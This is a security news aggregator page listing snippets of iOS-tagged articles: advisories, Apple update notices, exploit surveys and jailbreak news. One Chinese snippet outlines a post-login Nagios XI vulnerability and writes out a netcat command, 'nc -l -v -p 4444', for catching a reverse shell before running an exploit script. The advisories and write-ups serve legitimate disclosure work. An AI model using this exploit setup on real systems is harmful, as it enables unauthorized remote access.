HackDig : Dig high-quality web security articles for hackers

[SYSS-2020-011] Apple iOS - Exposure of Resource to Wrong Sphere (CWE-668)

Advisory ID: SYSS-2020-011Product: Apple iOSManufacturer: Apple Inc.Affected Version(s): 13.3.1, 13.5.1Tested Version(s): 13.3.1, 13.5.1Vulnerability Type: Exposure of Resource to Wrong Sphere (CWE-668)Risk Level: MediumSolution Status: OpenManufacturer Notification: 2020-03-23Solution Date: -Public Disclosure: 2020-07-02CVE Reference: Not yet assignedAuthor
Publish At:2020-07-03 13:50 | Read:66 | Comments:0 | Tags: IOS

What’s Coming in macOS Big Sur and iOS 14 – Intego Mac Podcast Episode 141

This week, Apple announced the new features for its coming operating system updates: macOS Big Sur, and iOS 14. They also announced a big change to Mac hardware. Josh and Kirk discuss the changes coming, and take a close look at security and privacy features in these operating systems. Apple’s New Plans for the iPhone, iPad, and Mac Unveiled at WWDC 2020Univ
Publish At:2020-06-26 13:26 | Read:144 | Comments:0 | Tags:Intego Mac Security Podcast IOS

An Apple a Day: Treating BYOD Pains with Apple User Enrollment

Even with workers returning to the office—it might be a trickle or a flood depending on the organization—the shift towards remote work is moving from just a short-term necessity to a long-term reality. That shift has changed the face of business worldwide. This change makes it more important than ever for IT and Security teams to prioritize endpoint manageme
Publish At:2020-06-24 11:06 | Read:115 | Comments:0 | Tags:Application Security Endpoint Mobile Security user enrollmen

macOS 11 and iOS 14 – New security and privacy features

In a socially-distanced keynote address to open Apple’s Worldwide Developer Conference yesterday, the company presented new features for the next versions of all of its operating systems. Apple announced new features for macOS, iOS, iPadOS, watchOS, and tvOS, and security and privacy features were prominent across the various operating systems. In this
Publish At:2020-06-24 09:27 | Read:118 | Comments:0 | Tags:Security & Privacy IOS

A survey of recent iOS kernel exploits

Posted by Brandon Azad, Project ZeroI recently found myself wishing for a single online reference providing a brief summary of the high-level exploit flow of every public iOS kernel exploit in recent years; since no such document existed, I decided to create it here.This post summarizes original iOS kernel exploits from local app context targeting iOS 10 thr
Publish At:2020-06-22 11:43 | Read:170 | Comments:0 | Tags: IOS exploit

The Pros and Cons of Apple’s iOS App Store

If you use apps on your iPhone or iPad, other than those included in iOS, you get them from Apple’s App Store. Since Apple’s App Store is the only way to install apps on iOS devices (unlike with macOS where you can obtain apps from the Mac App Store or from developers) you have to use Apple to provide these apps. The App Store has lots of advanta
Publish At:2020-06-19 13:37 | Read:134 | Comments:0 | Tags:Apple App Store IOS

Managing Battery Life on Macs and iOS Devices

Batteries are essential to our portable devices. For many of us, in our everyday use of Macs and iOS devices, we don’t have to worry too much about this. Modern iPhones and iPads provide a full day‘s battery life, and if you use a portable Mac, you can probably get through the day unless you are using battery-intensive apps.But sometimes you can’t. If you’re
Publish At:2020-06-13 14:46 | Read:159 | Comments:0 | Tags:How To Battery iPad iPhone macOS IOS

Fraudulent iOS VPN Apps Attempt to Scam Users

Digital security and privacy company Avast has issued a warning after it discovered three VPN Apps, available on the Apple App Store, which it claimed are fraudulent and appear to be ‘fleeceware’ – apps that are not ‘malicious’ but do not provide the services they claim to and/or are sold at far higher prices than they should be
Publish At:2020-06-04 10:12 | Read:225 | Comments:0 | Tags: IOS

Top Mobile Finance Apps Consistently Failing Security and Data Privacy Tests

iOS and Android apps fail coding best practices, are susceptible to reverse engineering, and share sensitive user data  Executive Summary Top banks and mobile payment providers are putting their customers at risk for security and privacy by failing to adhere to coding best practices and continuing to share sensitive customer data with advertisers. According
Publish At:2020-06-03 10:09 | Read:203 | Comments:0 | Tags:App Security Android apps banking apps iOS zDefend zScan zSh

APPLE-SA-2020-06-01-1 iOS 13.5.1 and iPadOS 13.5.1

-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2020-06-01-1 iOS 13.5.1 and iPadOS 13.5.1iOS 13.5.1 and iPadOS 13.5.1 are now available and address thefollowing:KernelAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4and later, and iPod touch 7th generationImpact: An application may be able to execute arbitrary code withkernel privi
Publish At:2020-06-03 02:22 | Read:452 | Comments:0 | Tags: IOS

Learn How to Use the Secret Features of the iPad and iPhone Control Center

There are a lot of things you can do on your iPhone or iPad, and you can quickly access some important settings, even from the lock screen using Control Center. This interface lets you enable, disable, and adjust a number of settings on your iPhone, and even control things like smart home devices or music playback. But there are a number of secret features i
Publish At:2020-05-30 06:50 | Read:291 | Comments:0 | Tags:How To iOS iPad iPhone

APPLE-SA-2020-05-26-2 iOS 12.4.7

-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2020-05-26-2 iOS 12.4.7iOS 12.4.7 addresses the following:MailAvailable for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPadmini 2, iPad mini 3, and iPod touch 6th generationImpact: Processing a maliciously crafted mail message may lead tounexpected memory modification or application terminationDescri
Publish At:2020-05-29 13:49 | Read:455 | Comments:0 | Tags: IOS

APPLE-SA-2020-05-26-1 iOS 13.5 and iPadOS 13.5

-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2020-05-26-1 iOS 13.5 and iPadOS 13.5iOS 13.5 and iPadOS 13.5 address the following:AccountsAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4and later, and iPod touch 7th generationImpact: A remote attacker may be able to cause a denial of serviceDescription: A denial of service issue
Publish At:2020-05-29 13:49 | Read:547 | Comments:0 | Tags: IOS


登陆后的,比较鸡肋。4月份发现的,一直放着,后来看官网更新了,直接发出来吧。另外官方还有一个明显的sql注入没修复。不过也是登陆后,感兴趣的可以去看一下。 简要信息 版本: 5.6.13(5.6.11版本也存在问题,只需要把最后文件名字中的 - 去掉) 条件:登陆后 漏洞文件相关路径:/includes/components/xicore/export-rrd.php、includes/utils-rrdexport.inc.php 漏洞参数:step、start、end 环境 python3 requests库,使用pip3安装即可。python3 -m pip install requests 运行 首先在远程机器上监听端口,用于反弹。命令:nc -l -v -p 4444 python3 nagiox.
Publish At:2020-05-27 07:25 | Read:277 | Comments:0 | Tags: IOS

New iPhone jailbreak released

byPaul DucklinApple’s latest iOS versions have only been out for a week.The updates are new enough that Apple’s own Security updates page still lists [2020-05-26T14:00Z] the security holes that were fixed in iOS 13.5 and iOS 12.4.7 as “details available soon”.But there’s a jailbreak available already for iOS 13.5, released by th
Publish At:2020-05-26 12:55 | Read:315 | Comments:0 | Tags:Apple iOS DMCA Exploit ios iPhone jailbreak right to repair


Share high-quality web security related articles with you:)